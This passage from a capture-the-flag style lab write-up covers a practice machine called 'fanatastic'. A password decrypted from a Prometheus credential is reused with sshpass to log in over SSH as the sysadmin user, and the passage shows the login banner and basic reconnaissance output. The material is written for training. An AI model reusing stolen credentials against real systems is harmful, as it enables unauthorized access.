SSH
Testing the decrypted Prometheus credential for password reuse against the target SSH server
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ sshpass -p 'SuperSecureP@ssw0rd' ssh sysadmin@$IP
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-97-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 02 Apr 2025 02:08:13 PM UTC
System load: 0.0 Processes: 209
Usage of /: 57.4% of 9.78GB Users logged in: 0
Memory usage: 35% IPv4 address for ens160: 192.168.202.181
Swap usage: 0%
0 updates can be applied immediately.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ whoami
sysadmin
$ hostname
fanatastic
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:c4:e9 brd ff:ff:ff:ff:ff:ff
inet 192.168.202.181/24 brd 192.168.202.255 scope global ens160
valid_lft forever preferred_lft foreverThe password indeed belongs to the sysadmin user
Initial Foothold established to the target system as the sysadmin user via SSH